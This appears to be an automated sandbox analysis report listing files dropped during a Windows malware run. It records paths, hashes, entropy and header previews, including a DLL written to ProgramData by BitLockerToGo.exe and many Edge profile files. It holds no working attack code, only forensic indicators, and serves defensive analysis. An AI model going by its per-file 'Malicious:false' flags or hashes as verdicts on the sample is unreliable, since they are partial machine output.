                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):80880
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\29794eeb-1179-4f49-8576-8748bf02c527.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):44170
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.0905293170759895
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4ktCLmZtxtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynjtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                                                                  MD5:172CA269327D025CFEF762207219D2CA
                                                                                                                                                                                                                                                                                                                  SHA1:B1C083180A984AD1188AD033F14C405DE5842CE1
                                                                                                                                                                                                                                                                                                                  SHA-256:F6E78CBF693CAD0EB08938C6700C8958BAA254F6C77A7B1558C5BF9846899800
                                                                                                                                                                                                                                                                                                                  SHA-512:FE3FC566E75C959A17F132DD97AB5857C9D931C7DDFA7C98128A1388635D9CB61304F79A1C0074F75184264C9F14743FC362943FE798EC3E5C07D4939C0768BA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\44bf9d3d-436c-4eba-983e-a56496463353.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):44723
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096139010608138
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xp/LmZikZ8QUoD+PJKwWE7RTupzKscDX//NPC1os:z/Ps+wsI7yOGZaKoRTuiVIos
                                                                                                                                                                                                                                                                                                                  MD5:987654CAB3FD0BF770E2B36B6072A745
                                                                                                                                                                                                                                                                                                                  SHA1:7A70AFC6BC9808ABBBBEF90162EFA8F60F59B32E
                                                                                                                                                                                                                                                                                                                  SHA-256:5435E9248C9319CCB7211AFFC5C159D1EA3737846DDB1D6908C3640CA5F3D8E6
                                                                                                                                                                                                                                                                                                                  SHA-512:5C5D56FBB23E67059EAD80DC3FC0AD5D2F75B7FE2AFF6158E316B6D4E7DDBD63F9D30DAC436E6D9E7603BB84BA5613D7BDE0AB92B6798FB7B34AC0286CD5EFD4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4d80bdea-64cb-446b-9531-364381d5611f.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                  Size (bytes):44641
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.095733887872189
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kL/LmZikZSwucDPb38JKwWE7RTupzKscDX//NPC1os:z/Ps+wsI7ynUZEKoRTuiVIos
                                                                                                                                                                                                                                                                                                                  MD5:FDE831B66FCEC5E35605AAABC3BAF6E2
                                                                                                                                                                                                                                                                                                                  SHA1:8A5525F9F32358928242C4DCE0AE70F2AFA6D5E6
                                                                                                                                                                                                                                                                                                                  SHA-256:F4498C49327F153120A9950E1A86A37A8DCD020E19C0D2875D6A5A73091D02C7
                                                                                                                                                                                                                                                                                                                  SHA-512:DCEDD64C95F37DA9B78382B012481106D6E6C3D43C45B0ACF5D84719B2C9D60730E3E0D1F2CFE658DAE5A28142500EBDC7DE3AB38CCEF006984BF75A83C7480C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-673F483B-938.pma

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.04727269386388711
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:JZCJa/0pqtmsnOAQpYiJPi6VBK/7+HfgHXybc7IKMEYTwgh0MNSsyzRQcD/OKfJs:X2a/0ctLMd44LphhIVfDfJ08T2RGOD
                                                                                                                                                                                                                                                                                                                  MD5:6BAC925AE386035413BD905DB41C598C
                                                                                                                                                                                                                                                                                                                  SHA1:CA97FDA25E122F2935CF51E7B1F168D61DF53909
                                                                                                                                                                                                                                                                                                                  SHA-256:65A65B0D5A2D1DD3D22F30A22629DF709E3C7C0F3F80FD1C4ACCEF55702F84C9
                                                                                                                                                                                                                                                                                                                  SHA-512:AEA541FE99684517ACB11CD67EF832C433134968A27644BC8886725D3990FD3F5BE638A5F3A4926F6953FBEAA95A912403AA198B0438C6D46DDD7817C52B806D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@...............xj..0Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".vmamye20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............!......................w..U..G...W6.>.........."....."...24.."."h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...V.-../Q@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2........6...... .2........V..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-673F483C-19C4.pma

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4275461847564229
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:Qg4vos/zGX0WnhdMBwMPs7pY/UDFM4az9pW2bWDq3Xg1HFD:OvoZZMBwOs7ptxrR2bWDq3XaHB
                                                                                                                                                                                                                                                                                                                  MD5:159569B0913F252CEBCCEFC7469175FC
                                                                                                                                                                                                                                                                                                                  SHA1:621D3576FAB058E9F79CD8D665DB84B59DECA075
                                                                                                                                                                                                                                                                                                                  SHA-256:FF0CCBC905386345C98D13AD8E4B3D7BEEAEF9FEC632428EA7E57FA476A819E2
                                                                                                                                                                                                                                                                                                                  SHA-512:384E1C13479774F05069CEF872A0303BBE84529C5F8AEEBC5B3F34282D65B163E7B1C6B4C593D6CE7959D6B392179C403B0459C3280DE58DF4B7DC7F90CA25EE
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@................D..pC..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".vmamye20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............!......................w..U?:K...G...W6.>.........."....."...24.."."h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...V.-../Q@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................ .2.......

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):280
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.195531555605597
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:FiWWltlMpKoKuNoDZbkDURSHxig5ABVP/Sh/JzvNKIUBUhX9USWXQPWllt:o1GVKCoD4Hxi2ABVsJDZYeulX+W/
                                                                                                                                                                                                                                                                                                                  MD5:B43C738AB1422F16D60B4C4B49CC7DF2
                                                                                                                                                                                                                                                                                                                  SHA1:98C07F5F5E4F25C2BC0B2B5E6A3A2245F7D18215
                                                                                                                                                                                                                                                                                                                  SHA-256:C28208A8D5052C44515333D67BE35E9900BB0C1E68DECF8C8CDC8DB67DE51E4C
                                                                                                                                                                                                                                                                                                                  SHA-512:07A58D40C283CBDB4063D1EF70EBDAFF8E84CB47F530B939FA25195F9652976CB3E439F315A18D732128E60B5F2856DC1CA42E814DE45F2301DC143A0D22798E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:sdPC.........................TJ.[Y....."h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................ecadf109-1d88-4bd2-8ebf-85346832b43e............

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\11532a6d-242d-4e38-b742-1f20bcc8def9.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1e4bf043-0f6a-4596-9d44-1d15441977c4.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):35114
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.555993605134716
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:y6dPpjWPFuM/fWa8F1+UoAYDCx9Tuqh0VfUC9xbog/OV4mzLYrwy2StqKpXtu6:y6dPpjWPIWfWau1ja5KLJy2S8WtF
                                                                                                                                                                                                                                                                                                                  MD5:84AFA2172145E6690AE4686DBE872C0B
                                                                                                                                                                                                                                                                                                                  SHA1:69825CAEDA064A58F7BB8AD9DD354A78E83AC023
                                                                                                                                                                                                                                                                                                                  SHA-256:4193DE3F42FE85ACB6ED47C13C8D0CD63EED288CA6EFEEC4FED265DB71E65ED9
                                                                                                                                                                                                                                                                                                                  SHA-512:1BB9402C4985EC5C2393B8317C641964C0A9E2FA786F2988F7B32F448E363BEFD0CB632F74600A75F95E69D3EC72F96BF466BA446FFE3482322487D8C32C82FC
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376674108719745","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376674108719745","location":5,"ma

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\62960126-b725-4189-9d5b-07633611f377.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\76949767-d67f-45f7-b538-9b1d3019ccf1.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):13342
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.280059902308109
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:stQJ99QTryDiuabatSuypmV7sb9FIa340ybkRRb85nbV+FiwQA4ff7NIyPZYJ:stQPGQSu4mpsb9FXxabGxQxff7NI5
                                                                                                                                                                                                                                                                                                                  MD5:324B34BE3A84B81E3E1ECB356CDE045D
                                                                                                                                                                                                                                                                                                                  SHA1:16B250CE1711C3986C4F784D5FD7B8324327260D
                                                                                                                                                                                                                                                                                                                  SHA-256:A9E0F65FFDA20BFF10AAF59CB278F021C8CEC2F35E0CC4D48138EEC40AB1199D
                                                                                                                                                                                                                                                                                                                  SHA-512:484690DB56066225C7F44B3A15780EABC23A70556A34C91E02EF32F235A4C05AABF1C3229EA93CD77F81001F4C70865279C49CA6AB6F96E89A4582D043F28D03
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376674109197488","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\78fcdd3b-5a0c-4d64-aba3-10129e819b0a.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40470
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.561339271051783
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:y6dPRl7pLGLPpjWPFuM/fWa8F1+UoAYDCx9Tuqh0VfUC9xbog/OVZ7NmzLYrwy2W:y6dPRzcPpjWPIWfWau1jaM7NKLJy2Ja1
                                                                                                                                                                                                                                                                                                                  MD5:879C7A14EE5170CA84F41D47FD2A1097
                                                                                                                                                                                                                                                                                                                  SHA1:970EE5F492971E47C3242AF212CE6407D6243DB0
                                                                                                                                                                                                                                                                                                                  SHA-256:1CEC1092CE957B94A00B80784436D07F39584A6268A5F18931E7053B94EBA9C4
                                                                                                                                                                                                                                                                                                                  SHA-512:4D706708971CF4F730775EC4D9EFE863860A196F865DA3483879E5F463B3EDF61158F118CB52FC43DA3BFC42A1F013C25614BDA24C23978819E28EEC110A8F60
                                                                                                                                                                                                                                                                                                                  Malicious:false
